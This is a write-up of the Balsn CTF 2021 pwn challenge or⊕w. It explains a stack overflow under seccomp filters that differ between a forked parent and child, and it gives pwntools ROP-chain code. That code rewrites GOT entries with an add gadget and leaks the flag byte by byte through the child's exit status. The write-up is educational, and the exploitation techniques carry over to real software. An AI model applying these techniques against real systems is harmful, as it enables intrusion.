or⊕w writeup from Balsn CTF 2021

Author : how2hack
Upload : Nov 20th, 2021
Rating : I will rate it 10/10
Platform : Linux
Files : or⊕w
Desc : No more orw for you :(

First look

or⊕w was the easiest pwn challenge of Balsn CTF 2021. There were 4 pwn challenges in total; the other 3 were really hard, and or⊕w was the only one I managed to solve. Here is the list of pwn challenges.

1. or⊕w (BOF with seccomp) - 15 Solves
2. Futex (Kernel) - 0 Solves
3. Kawaii Note (Heap Note) - 1 Solve
4. NoteEdit (macOS Heap Note) - 0 Solves

Here is the checksec output -

I really liked the or⊕w challenge because it was not like any other ROP challenge: it combined several different concepts, and I learned a lot from it.

In this beautiful decompilation given by IDA, you can easily spot the vulnerability. It's a very obvious stack buffer overflow: the stack only reserves 16 bytes for the buffer, but the read() call reads up to 0x400 (1024) bytes of input. But if you look closely, you will see that it's not your normal buffer overflow challenge.

After the call to read() we see that the program calls fork() and handles the parent and the child differently. If you don’t know what fork() does, it basically creates a clone of the process with the exact same execution state, the only difference being the return value of the call. fork() is a thin wrapper around a system call (glibc actually uses the clone syscall, which takes more arguments, rather than the fork syscall). The newly created process is called the child of the original process, and the original process is called the parent.

The return value of fork() is different in the parent and the child so that the code can differentiate whether it is running in the child or in the parent.

When fork() returns a non-zero value, we are in the parent, and this non-zero value is the PID (Process ID) of the child which was just spawned. In the child, fork() returns zero. You can see in the above code that if we are in the parent we call wait(), which is just a wrapper around the wait4 system call. wait4 blocks until the state of a child of the calling process changes.
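The parent/child split described above can be reproduced in a few lines of Python. This is only a minimal sketch, not the challenge binary: `run_fork_demo` is a hypothetical helper name, and the exit code 7 is an arbitrary value chosen for illustration.

```python
import os


def run_fork_demo(exit_code: int = 7) -> int:
    """Fork once; the child exits with exit_code, the parent returns the raw wait status."""
    pid = os.fork()
    if pid == 0:
        # Child: fork() returned 0. Exit right away, skipping interpreter cleanup.
        os._exit(exit_code)
    # Parent: fork() returned the child's PID. Block until the child terminates.
    _, status = os.waitpid(pid, 0)
    return status


if __name__ == "__main__":
    status = run_fork_demo(7)
    # WIFEXITED tells us the child exited normally, WEXITSTATUS extracts its exit code.
    print(hex(status), os.WIFEXITED(status), os.WEXITSTATUS(status))
```

The parent never runs concurrently with the child's exit here: it sits in `waitpid` until the child is gone, which is the same ordering the challenge binary enforces.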

In the code above you can see that it calls different seccomp functions to install different syscall filters in the parent and the child. Seccomp filtering lets a process specify a filter for the system calls it makes. These filters are a security mitigation that limits the damage if the process is compromised: every syscall is denied except for a few selected ones which the programmer thinks are safe.

It closes stdin, stdout and stderr in the parent so we cannot do funky stuff in the child process. One thing I did not notice at first was that the status word is stored in the .bss section, which turned out to be crucial for my exploit.

So let’s now analyse the seccomp filters of the child process and the parent process.

Seccomp parent

This function applies the following seccomp filter to the process.

SYS_NO.	Syscall	Filter
001	SYS_write	Allowed
060	SYS_exit	Allowed
231	SYS_exit_group	Allowed

Performing any other syscall will result in the process being killed by SIGSYS (Bad system call).

Seccomp child

This function applies the following seccomp filter to the process.

SYS_NO.	Syscall	Filter
000	SYS_read	Allowed
002	SYS_open	Allowed
257	SYS_openat	Allowed
060	SYS_exit	Allowed
231	SYS_exit_group	Allowed
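The two allowlists above can be modelled as plain Python dictionaries to check which syscall sequences survive in each process. This is a rough sketch, not the real BPF filter: the syscall numbers are the x86-64 ones (read is 0, write is 1, execve is 59), and `first_blocked` is a hypothetical helper introduced only for this illustration.

```python
# x86-64 syscall numbers allowed by each filter, taken from the tables above
PARENT_ALLOWED = {1: "write", 60: "exit", 231: "exit_group"}
CHILD_ALLOWED = {0: "read", 2: "open", 257: "openat", 60: "exit", 231: "exit_group"}


def first_blocked(syscalls, allowed):
    """Return the first syscall number that would trigger SIGSYS, or None."""
    for nr in syscalls:
        if nr not in allowed:
            return nr
    return None


OPEN_READ_WRITE = [2, 0, 1]  # the classic open/read/write chain
EXECVE = [59]                # what system() or a one-gadget ends up calling

if __name__ == "__main__":
    print("child dies on syscall", first_blocked(OPEN_READ_WRITE, CHILD_ALLOWED))
    print("parent dies on syscall", first_blocked(OPEN_READ_WRITE, PARENT_ALLOWED))
```

Neither process can run the full open/read/write chain on its own: the child is killed at write, and the parent is killed at open.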

Now let’s see what happens when the buffer overflows. We will send random data to the binary and observe the execution of both the child and the parent.

As you can see in the above image, after the clone syscall (which is what fork() actually issues) the child is spawned with PID 23852, receives SIGSEGV and crashes with a segfault. The same thing happens in the parent, but not in parallel as one might expect: it only happens once the child has exited or crashed.

This is because the parent makes a wait syscall and waits for the child to terminate first.

So the ROP chain that you provide is executed by both the parent and the child, but not in parallel. The child executes the ROP chain first, and then the parent executes it. The challenge now is: how do you get the flag with all these seccomp filters applied 😕 ?

Obviously system() or a one_gadget won’t work, because they all eventually make the execve syscall, which is blocked in both the child and the parent. So, how do you get the flag 🏁 ?

One might say: just open and read the flag in the child, and then write it out in the parent. But memory is not shared between the child and the parent, so even if we manage to read the flag in the child we cannot simply hand it to the parent to write it to stdout.

Also, if we create a ROP chain that reads the flag in the child, the parent will be killed by SIGSYS when it executes the same ROP chain, because the open and read syscalls are not allowed in the parent.

After 2 hours of brainstorming with my friends I figured out a way to exploit this thing. The idea is to execute different ROP chains in the parent and the child. But before trying to find a gadget that does this, let’s create the individual ROP chains for the child and the parent.

Our goal is to read the “flag” file in the child, because the open and read syscalls are only allowed there. The problem is that we don’t have a way to call open yet. We can call read, but before that we must open the file.

Introducing the 3D-Gadget

This is the most powerful gadget you can find in an ELF compiled by GCC.

This gadget (add dword [rbp-0x3D], ebx) lets you modify memory by adding a 32-bit value to a location of your choice. With it you can easily write 4 bytes at a time. This is the gadget that will allow us to call open.

Because the binary has partial RELRO, the GOT is writable, so we can use this gadget to make any GOT entry point to an arbitrary address in LibC by adding an offset to its lower 32 bits.
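To make the arithmetic concrete, here is a small Python model of the gadget acting on a fake GOT. It is only a sketch: every address and LibC offset below is a made-up value for illustration, and `add_dword_gadget` is a hypothetical helper, not part of the exploit.

```python
import struct

# All values below are hypothetical, chosen only to illustrate the arithmetic.
GOT_BASE = 0x404000          # start of our fake memory image
GOT_CLOSE = 0x404040         # pretend GOT slot of close
LIBC_BASE = 0x7F1234500000   # pretend LibC load address
CLOSE_OFF = 0x10E660         # pretend offset of close in LibC
OPEN_OFF = 0x10DF00          # pretend offset of open64 in LibC


def add_dword_gadget(memory: bytearray, base: int, rbp: int, ebx: int) -> None:
    """Model of `add dword [rbp-0x3d], ebx`: a 32-bit add that wraps around."""
    off = rbp - 0x3D - base
    (old,) = struct.unpack_from("<I", memory, off)
    struct.pack_into("<I", memory, off, (old + ebx) & 0xFFFFFFFF)


memory = bytearray(0x100)
# The dynamic linker has already resolved close, so its slot holds a LibC address.
struct.pack_into("<Q", memory, GOT_CLOSE - GOT_BASE, LIBC_BASE + CLOSE_OFF)

# We never learn LIBC_BASE; only the difference between the two offsets is needed.
delta = (OPEN_OFF - CLOSE_OFF) & 0xFFFFFFFF
add_dword_gadget(memory, GOT_BASE, GOT_CLOSE + 0x3D, delta)

(patched,) = struct.unpack_from("<Q", memory, GOT_CLOSE - GOT_BASE)
print(hex(patched))
```

Only the low 32 bits of the slot change, so the trick relies on the old and new targets sharing the same upper 32 bits, which holds when both live in the same LibC mapping and the low dword does not need a carry into the upper half.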

Environment Setup

To know which offset to add to or subtract from a GOT entry, we must know the exact LibC running on the server. During the CTF I completely forgot that the Dockerfile was given to us, so I went the old way of leaking an address and then using CTFMate to find the LibC version.

I quickly crafted a ROP chain to print the GOT entries of puts and read, then used CTFMate to get the LibC and patch the binary to use the downloaded LibC and a custom linker just for this LibC.

Exploit Plan

The plan for the exploit is to first read the flag into the child’s memory, then load the first byte of the flag into the rdi register, and then make the exit syscall. When the child exits and the parent resumes execution, the status word on the parent’s BSS holds the exit code of the child. Since the child exited with the first character of the flag as its exit code, we have essentially leaked one character of the flag from the child.
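It helps to look at how Linux lays out the status word for a normal exit: the exit code sits in bits 8 to 15 and the low byte is zero. The following sketch (with hypothetical helper names, and "B" as an arbitrary example flag byte) shows why the leaked character ends up one byte past the start of the status word.

```python
import struct


def status_word_for_exit(code: int) -> int:
    """Wait status of a process that exited normally with the given code."""
    return (code & 0xFF) << 8


def bytes_in_memory(status: int) -> bytes:
    """The 4-byte int as it sits in memory on little-endian x86-64."""
    return struct.pack("<i", status)


flag_byte = ord("B")  # example value for the first flag character
raw = bytes_in_memory(status_word_for_exit(flag_byte))

# A C-string function pointed at raw[0] sees an empty string because the low
# byte is zero; pointed at raw[1] it sees exactly the leaked character.
leaked = raw[1:].split(b"\x00")[0]
print(raw, leaked)
```

This is why printing from the address of the status word plus one is enough to recover the byte in the parent.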

But in order to execute this plan we need a ROP chain that can tell the parent and the child apart: it must run one chain in the child (to open and read the flag) and a different one in the parent (to print the leaked flag character).

After going through thousands of gadgets in LibC and the binary I found the perfect gadget. It lives inside __libc_csu_init.

The ROP DIFF Gadget starts at 0x401561. The idea is that if rbp contains the value of the status word and rbx contains zero, the gadget is essentially comparing the status word against zero. If it is non-zero we are in the parent, and we must not execute the open-read-exit ROP chain, which is meant for the child. If the status word is zero we are in the child, and after a bunch of pops the gadget simply returns into whatever ROP chain follows on the stack.

When this gadget detects that we are in the parent (non-zero status word) it jumps to 0x401550, which calls whatever function pointer is stored at [r15 + rbx * 8]. Since rbx is zero it just dereferences r15 and calls that address with arguments taken from r12, r13 and r14.

To call puts on the status word we just need to point r15 at the puts GOT entry and r12 at the address of the status word in BSS. We are lucky that PIE is disabled and that BSS addresses fit in 32 bits, because the upper 32 bits of r12 are discarded and only the lower 32 bits are moved into the edi register.
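The branching behaviour can be summarised with a tiny Python model. It is a sketch built from the description above, not a disassembly: `rop_diff_gadget` is a hypothetical name, and the status value 0x4200 is just an example of a child that exited with the byte "B".

```python
STATUSG = 0x40408C  # address of the status word on BSS, as used in the exploit


def rop_diff_gadget(rbp: int, rbx: int, r12: int):
    """Model of the gadget at 0x401561: compare rbp with rbx and branch."""
    if rbp != rbx:
        # Parent path: jump to 0x401550, which calls [r15 + rbx*8].
        # Only the low 32 bits of r12 reach the first argument register (edi).
        return ("call", r12 & 0xFFFFFFFF)
    # Child path: skip 7 stack slots, then return into the rest of the chain.
    return ("fall_through", None)


child = rop_diff_gadget(rbp=0, rbx=0, r12=STATUSG + 1)        # status word is 0
parent = rop_diff_gadget(rbp=0x4200, rbx=0, r12=STATUSG + 1)  # child exited with "B"
print(child, parent)
```

The same payload therefore takes two different paths, purely because the status word differs between the two processes.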

Getting Gadgets from LibC

To move the value of the status word into rbp I needed some gadgets which were not present in the binary, so I used the 3D-Gadget to turn some otherwise useless GOT entries into useful gadgets.

GOT	gadget
fork	xchg eax, ebp ; ret
setbuf	mov rax, qword ptr [rdi + 0x20] ; ret
read	pop rbx ; ret

The rop chain looks like this.

import pwn

# exe, libc and offset are set up earlier in the full exploit

# gadgets
POP_RDI = 0x401573  # pop rdi ; ret
POP_RSI = 0x401571  # pop rsi ; pop r15 ; ret
POP_RSP = 0x40156d  # pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
RET_GDT = POP_RDI+1 # ret
BSS_ADR = 0x404090  # ---
_3D_GDT = 0x40125c  # add dword [rbp-0x3D], ebx ; nop  ; ret
POP_RBP = 0x40156f  # ---
POP_RPX = 0x40156a  # ---
CALL_XX = 0x401550  # ---
STATUSG = 0x40408C  # status word on BSS

# offsets of the gadgets inside LibC
X_AX_BP = 0x04d360  # xchg eax, ebp ; ret
M_AX_DI = 0x0e1414  # mov rax, qword ptr [rdi + 0x20] ; ret
POPRBX2 = 0x0331ff  # pop rbx ; ret
EXITGDT = 0x122294  # mov edi, eax ; mov eax, 0x3c ; syscall


stage_1 = pwn.cyclic(offset)

# plan: load the status word into rbp
# if it is not zero (parent) we call puts(status_word + 1)
# if it is zero (child) we simply fall through to the rest of the chain


# setup xchg eax, ebp ; ret (fork GOT entry)
stage_1 += pwn.p64(POP_RPX)
stage_1 += pwn.p64((X_AX_BP - libc.symbols['fork']) & 0xffffffff)
stage_1 += pwn.p64(exe.got['fork'] + 0x3d) + pwn.p64(0) * 4
stage_1 += pwn.p64(_3D_GDT)

# setup mov rax, qword ptr [rdi + 0x20] ; ret (setbuf GOT entry)
stage_1 += pwn.p64(POP_RPX)
stage_1 += pwn.p64((M_AX_DI - libc.symbols['setbuf']) & 0xffffffff)
stage_1 += pwn.p64(exe.got['setbuf'] + 0x3d) + pwn.p64(0) * 4
stage_1 += pwn.p64(_3D_GDT)

# setup pop rbx ; ret (read GOT entry)
stage_1 += pwn.p64(POP_RPX)
stage_1 += pwn.p64((POPRBX2 - libc.symbols['read']) & 0xffffffff)
stage_1 += pwn.p64(exe.got['read'] + 0x3d) + pwn.p64(0) * 4
stage_1 += pwn.p64(_3D_GDT)

With the setup complete, let’s create the parent ROP chain.

stage_1 += pwn.p64(POP_RDI)           # rdi = status_word - 0x20
stage_1 += pwn.p64(STATUSG - 0x20)
stage_1 += pwn.p64(exe.plt['read'])   # rbx = 0
stage_1 += pwn.p64(0)

stage_1 += pwn.p64(exe.plt['setbuf']) # rax = [status_word]
stage_1 += pwn.p64(exe.plt['fork'])   # ebp = eax

stage_1 += pwn.p64(POP_RPX + 2)
stage_1 += pwn.p64(STATUSG+1)         # r12 = status_word+1
stage_1 += pwn.p64(0)                 # r13 = 0
stage_1 += pwn.p64(0)                 # r14 = 0
stage_1 += pwn.p64(exe.got['puts'])   # r15 = puts.got
stage_1 += pwn.p64(CALL_XX + 0x11)    # ROP DIFF GADGET

# NULL padding for continuing to child
stage_1 += pwn.p64(0) * 7             # continue to child


In the above ROP chain, the last gadget before the padding (CALL_XX + 0x11) is the ROP DIFF GADGET. It calls puts(status_word + 1) if the value of rbp is non-zero, and it goes on to pop 7 values from the stack if the value of rbp is zero.

The 7 NULLs account for the exit path of the ROP DIFF GADGET.

After this we repoint the close GOT entry at open64 and restore the read GOT entry. We also put the flag path string in memory, to be used by the child ROP chain to open the flag.

# set close -> open64
stage_1 += pwn.p64(0) * 7
stage_1 += pwn.p64(POP_RPX)
# masked to 32 bits like the other deltas, since only ebx is added
stage_1 += pwn.p64((libc.symbols['open64'] - libc.symbols['close']) & 0xffffffff)
stage_1 += pwn.p64(exe.got['close'] + 0x3d) + pwn.p64(0) * 4
stage_1 += pwn.p64(_3D_GDT)

# fix read's got address
stage_1 += pwn.p64(POP_RPX)
stage_1 += pwn.p64((libc.symbols['read'] - POPRBX2) & 0xffffffff)
stage_1 += pwn.p64(exe.got['read'] + 0x3d) + pwn.p64(0) * 4
stage_1 += pwn.p64(_3D_GDT)

# store "./fl"
stage_1 += pwn.p64(POP_RPX)
stage_1 += pwn.p64(pwn.u32(b"./fl"))
stage_1 += pwn.p64(BSS_ADR+0x3d) + pwn.p64(0) * 4
stage_1 += pwn.p64(_3D_GDT)

# store "ag\x00\x00"
stage_1 += pwn.p64(POP_RPX)
stage_1 += pwn.p64(pwn.u32(b"ag\x00\x00"))
stage_1 += pwn.p64(BSS_ADR+4+0x3d) + pwn.p64(0) * 4
stage_1 += pwn.p64(_3D_GDT)

Once you figure out how to execute different ROP chains with the same payload under parent and child, the rest of the exploitation is fairly easy.

I created a small function that gives me the ROP chain to leak a specific byte of the flag, and then I just ran the exploit repeatedly until I leaked the “}” character, which means we have the whole flag.
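The stop-at-“}” loop can be sketched independently of the target. In this illustration `leak_byte` is a hypothetical callable standing in for one full connection that sends the payload for index i and returns the single leaked byte; the fake flag is made up so the example runs without a server.

```python
from typing import Callable


def leak_flag(leak_byte: Callable[[int], bytes], max_len: int = 64) -> bytes:
    """Leak one byte per attempt until the closing brace shows up."""
    flag = b""
    for i in range(max_len):
        b = leak_byte(i)
        if not b:
            # Nothing came back (for example a NUL byte or a dead connection).
            break
        flag += b
        if b == b"}":
            break
    return flag


if __name__ == "__main__":
    fake_flag = b"BALSN{not_the_real_flag}"  # made-up stand-in for the remote flag
    print(leak_flag(lambda i: fake_flag[i:i + 1]))
```

Stopping on “}” avoids hard-coding the flag length, at the cost of assuming the flag contains exactly one closing brace at the end.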

To get nice output from the exploit I used the logging functionality of pwntools.

flag = b" "

with pwn.context.local(log_level='warn'), \
    pwn.log.progress('Flag', level=pwn.logging.WARN) as flag_leak:
    i = 0
    while i != 41:
        io = start()
        io.sendlineafter(
           b"Can you defeat orxw?\n",
           give_exploit_for_index(i)
        )
        flag += io.recv().strip()
        flag_leak.status(flag.decode('latin1'))
        i += 1

    flag_leak.success(flag.decode('latin1'))

Final Exploit

The complete exploit can be found here.

Running the exploit gives this output.